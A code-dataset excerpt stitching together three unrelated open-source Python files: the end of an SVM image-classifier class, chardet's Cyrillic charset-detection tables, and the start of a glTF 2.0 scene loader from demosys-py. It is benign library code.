:param save_path: file path to save the resulting SVM model to,
None if not needed
:type save_path: str
:param read_image: function to use for reading the image from a path
:type read_image: function
:param get_input_vector: function to use for constructing the input
vector for a sample image
:type get_input_vector: function
"""
samples = []
for image in images:
img = read_image(image)
if img is None:
raise IOError("unable to read image: %s" % image)
samples.append(get_input_vector(img))
samples = numpy.array(samples, dtype=numpy.float32)
labels = numpy.array(labels, dtype=numpy.float32)
if len(samples) != len(labels):
raise ValueError("samples and labels should have same length")
try:
self.svm.train(samples, labels)
except:
raise ValueError("too few training samples")
if save_path is not None:
self.save(save_path)
def load(self, path):
"""Load an SVM model from a file.
:param path: path to the SVM data file
:type path: str
"""
if not (isinstance(path, str) or isinstance(path, unicode)):
raise TypeError("path should be a string")
if not os.path.isfile(path):
raise ValueError("invalid file path for SVM model")
self.svm.load(path)
def save(self, path):
"""Save the current SVM model to a file.
:param path: path to the destination file
:type path: str
"""
if not (isinstance(path, str) or isinstance(path, unicode)):
raise TypeError("path should be a string")
self.svm.save(path)
| mit |
tuxfux-hlp-notes/python-batches | archieves/batch-59/files/myvenv/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/langcyrillicmodel.py | 2762 | 17725 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# KOI8-R language model
# Character Mapping Table:
KOI8R_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, # 80
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, # 90
223,224,225, 68,226,227,228,229,230,231,232,233,234,235,236,237, # a0
238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253, # b0
27, 3, 21, 28, 13, 2, 39, 19, 26, 4, 23, 11, 8, 12, 5, 1, # c0
15, 16, 9, 7, 6, 14, 24, 10, 17, 18, 20, 25, 30, 29, 22, 54, # d0
59, 37, 44, 58, 41, 48, 53, 46, 55, 42, 60, 36, 49, 38, 31, 34, # e0
35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0
)
win1251_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246, 68,247,248,249,250,251,252,253,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
)
latin5_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
macCyrillic_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246,247,248,249,250,251,252, 68, 16,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255,
)
IBM855_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194, 68,195,196,197,198,199,200,201,202,203,204,205,
206,207,208,209,210,211,212,213,214,215,216,217, 27, 59, 54, 70,
3, 37, 21, 44, 28, 58, 13, 41, 2, 48, 39, 53, 19, 46,218,219,
220,221,222,223,224, 26, 55, 4, 42,225,226,227,228, 23, 60,229,
230,231,232,233,234,235, 11, 36,236,237,238,239,240,241,242,243,
8, 49, 12, 38, 5, 31, 1, 34, 15,244,245,246,247, 35, 16,248,
43, 9, 45, 7, 32, 6, 40, 14, 52, 24, 56, 10, 33, 17, 61,249,
250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255,
)
IBM866_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 97.6601%
# first 1024 sequences: 2.3389%
# rest sequences: 0.1237%
# negative sequences: 0.0009%
RussianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,2,2,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,2,3,3,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,2,3,1,3,3,1,3,3,3,3,2,2,3,0,2,2,2,3,3,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,3,3,2,2,3,2,3,3,3,2,1,2,2,0,1,2,2,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,3,0,2,2,3,3,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,1,2,3,2,2,3,2,3,3,3,3,2,2,3,0,3,2,2,3,1,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,3,3,3,3,2,2,2,0,3,3,3,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,2,3,2,2,0,1,3,2,1,2,2,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,2,1,1,3,0,1,1,1,1,2,1,1,0,2,2,2,1,2,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,2,2,2,2,1,3,2,3,2,3,2,1,2,2,0,1,1,2,1,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,2,3,3,3,2,2,2,2,0,2,2,2,2,3,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,2,3,2,2,3,3,3,3,3,3,3,3,3,1,3,2,0,0,3,3,3,3,2,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,2,3,3,0,2,1,0,3,2,3,2,3,0,0,1,2,0,0,1,0,1,2,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,3,0,2,3,3,3,3,2,3,3,3,3,1,2,2,0,0,2,3,2,2,2,3,2,3,2,2,3,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,0,2,3,2,3,0,1,2,3,3,2,0,2,3,0,0,2,3,2,2,0,1,3,1,3,2,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,3,0,2,3,3,3,3,3,3,3,3,2,1,3,2,0,0,2,2,3,3,3,2,3,3,0,2,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,2,2,2,3,3,0,0,1,1,1,1,1,2,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,3,3,3,3,3,0,3,2,3,3,2,3,2,0,2,1,0,1,1,0,1,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,2,2,2,2,3,1,3,2,3,1,1,2,1,0,2,2,2,2,1,3,1,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
2,2,3,3,3,3,3,1,2,2,1,3,1,0,3,0,0,3,0,0,0,1,1,0,1,2,1,0,0,0,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,2,1,1,3,3,3,2,2,1,2,2,3,1,1,2,0,0,2,2,1,3,0,0,2,1,1,2,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,3,3,3,1,2,2,2,1,2,1,3,3,1,1,2,1,2,1,2,2,0,2,0,0,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,1,3,2,2,3,2,0,3,2,0,3,0,1,0,1,1,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,2,3,3,3,2,2,2,3,3,1,2,1,2,1,0,1,0,1,1,0,1,0,0,2,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,1,1,2,1,2,3,3,2,2,1,2,2,3,0,2,1,0,0,2,2,3,2,1,2,2,2,2,2,3,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,1,1,0,1,1,2,2,1,1,3,0,0,1,3,1,1,1,0,0,0,1,0,1,1,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,3,3,3,2,0,0,0,2,1,0,1,0,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,0,2,3,2,2,2,1,2,2,2,1,2,1,0,0,1,1,1,0,2,0,1,1,1,0,0,1,1,
1,0,0,0,0,0,1,2,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,0,0,0,0,1,0,0,0,0,3,0,1,2,1,0,0,0,0,0,0,0,1,1,0,0,1,1,
1,0,1,0,1,2,0,0,1,1,2,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0,
2,2,3,2,2,2,3,1,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,0,1,0,1,1,1,0,2,1,
1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,0,
3,3,3,2,2,2,2,3,2,2,1,1,2,2,2,2,1,1,3,1,2,1,2,0,0,1,1,0,1,0,2,1,
1,1,1,1,1,2,1,0,1,1,1,1,0,1,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,1,1,0,
2,0,0,1,0,3,2,2,2,2,1,2,1,2,1,2,0,0,0,2,1,2,2,1,1,2,2,0,1,1,0,2,
1,1,1,1,1,0,1,1,1,2,1,1,1,2,1,0,1,2,1,1,1,1,0,1,1,1,0,0,1,0,0,1,
1,3,2,2,2,1,1,1,2,3,0,0,0,0,2,0,2,2,1,0,0,0,0,0,0,1,0,0,0,0,1,1,
1,0,1,1,0,1,0,1,1,0,1,1,0,2,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,3,2,3,2,1,2,2,2,2,1,0,0,0,2,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,2,1,
1,1,2,1,0,2,0,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,
3,0,0,1,0,2,2,2,3,2,2,2,2,2,2,2,0,0,0,2,1,2,1,1,1,2,2,0,0,0,1,2,
1,1,1,1,1,0,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1,
2,3,2,3,3,2,0,1,1,1,0,0,1,0,2,0,1,1,3,1,0,0,0,0,0,0,0,1,0,0,2,1,
1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,
2,3,3,3,3,1,2,2,2,2,0,1,1,0,2,1,1,1,2,1,0,1,1,0,0,1,0,1,0,0,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,2,0,0,1,1,2,2,1,0,0,2,0,1,1,3,0,0,1,0,0,0,0,0,1,0,1,2,1,
1,1,2,0,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,
1,3,2,3,2,1,0,0,2,2,2,0,1,0,2,0,1,1,1,0,1,0,0,0,3,0,1,1,0,0,2,1,
1,1,1,0,1,1,0,0,0,0,1,1,0,1,0,0,2,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0,
3,1,2,1,1,2,2,2,2,2,2,1,2,2,1,1,0,0,0,2,2,2,0,0,0,1,2,1,0,1,0,1,
2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,2,1,1,1,0,1,0,1,1,0,1,1,1,0,0,1,
3,0,0,0,0,2,0,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,0,1,0,1,
1,1,0,0,1,0,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,
1,3,3,2,2,0,0,0,2,2,0,0,0,1,2,0,1,1,2,0,0,0,0,0,0,0,0,1,0,0,2,1,
0,1,1,0,0,1,1,0,0,0,1,1,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
2,3,2,3,2,0,0,0,0,1,1,0,0,0,2,0,2,0,2,0,0,0,0,0,1,0,0,1,0,0,1,1,
1,1,2,0,1,2,1,0,1,1,2,1,1,1,1,1,2,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0,
1,3,2,2,2,1,0,0,2,2,1,0,1,2,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,
0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,0,2,3,1,2,2,2,2,2,2,1,1,0,0,0,1,0,1,0,2,1,1,1,0,0,0,0,1,
1,1,0,1,1,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
2,0,2,0,0,1,0,3,2,1,2,1,2,2,0,1,0,0,0,2,1,0,0,2,1,1,1,1,0,2,0,2,
2,1,1,1,1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,0,0,0,1,1,1,1,0,1,0,0,1,
1,2,2,2,2,1,0,0,1,0,0,0,0,0,2,0,1,1,1,1,0,0,0,0,1,0,1,2,0,0,2,0,
1,0,1,1,1,2,1,0,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,1,0,
2,1,2,2,2,0,3,0,1,1,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,
1,2,2,3,2,2,0,0,1,1,2,0,1,2,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,
0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,2,1,1,2,1,2,2,2,2,2,1,2,2,0,1,0,0,0,1,2,2,2,1,2,1,1,1,1,1,2,1,
1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,1,
1,2,2,2,2,0,1,0,2,2,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,
0,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,2,2,2,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,
0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,0,1,0,0,1,1,2,0,0,0,0,1,0,1,0,0,1,0,0,2,0,0,0,1,
0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,1,1,2,0,2,1,1,1,1,0,2,2,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,2,1,2,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
1,0,0,0,0,2,0,1,2,1,0,1,1,1,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,
0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,
2,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,0,1,1,0,1,0,1,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,0,
0,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
)
Koi8rModel = {
'charToOrderMap': KOI8R_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "KOI8-R"
}
Win1251CyrillicModel = {
'charToOrderMap': win1251_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "windows-1251"
}
Latin5CyrillicModel = {
'charToOrderMap': latin5_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-5"
}
MacCyrillicModel = {
'charToOrderMap': macCyrillic_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "MacCyrillic"
};
Ibm866Model = {
'charToOrderMap': IBM866_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "IBM866"
}
Ibm855Model = {
'charToOrderMap': IBM855_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "IBM855"
}
# flake8: noqa
| gpl-3.0 |
Contraz/demosys-py | demosys/loaders/scene/gltf.py | 1 | 24715 | # Spec: https://github.com/KhronosGroup/glTF/blob/master/specification/2.0/README.md#asset
import base64
import io
import json
import os
import struct
from collections import namedtuple
import numpy
from PIL import Image
from pyrr import Matrix44, matrix44, quaternion
import moderngl
from demosys import context
from demosys.loaders.scene.base import SceneLoader
from demosys.loaders.texture import t2d
from demosys.opengl.vao import VAO
from demosys.resources.meta import SceneDescription, TextureDescription
from demosys.scene import Material, MaterialTexture, Mesh, Node, Scene
GLTF_MAGIC_HEADER = b'glTF'
# Texture wrap values
REPEAT = 10497
CLAMP_TO_EDGE = 33071
MIRRORED_REPEAT = 33648
# numpy dtype mapping
NP_COMPONENT_DTYPE = {
5121: numpy.uint8, # GL_UNSIGNED_BYTE
5123: numpy.uint16, # GL_UNSIGNED_SHORT
5125: numpy.uint32, # GL_UNSIGNED_INT
5126: numpy.float32, # GL_FLOAT
}
ComponentType = namedtuple('ComponentType', ['name', 'value', 'size'])
COMPONENT_TYPE = {
5120: ComponentType("BYTE", 5120, 1),
5121: ComponentType("UNSIGNED_BYTE", 5121, 1),
5122: ComponentType("SHORT", 5122, 2),
5123: ComponentType("UNSIGNED_SHORT", 5123, 2),
5125: ComponentType("UNSIGNED_INT", 5125, 4),
5126: ComponentType("FLOAT", 5126, 4),
}
# dtype to moderngl buffer format
DTYPE_BUFFER_TYPE = {
numpy.uint8: 'u1', # GL_UNSIGNED_BYTE
numpy.uint16: 'u2', # GL_UNSIGNED_SHORT
numpy.uint32: 'u4', # GL_UNSIGNED_INT
numpy.float32: 'f4', # GL_FLOAT
}
ACCESSOR_TYPE = {
"SCALAR": 1,
"VEC2": 2,
"VEC3": 3,
"VEC4": 4,
}
class GLTF2(SceneLoader):
"""
Loader for GLTF 2.0 files
"""
file_extensions = [
['.gltf'],
['.glb'],
]
supported_extensions = []
def __init__(self, meta: SceneDescription):
"""
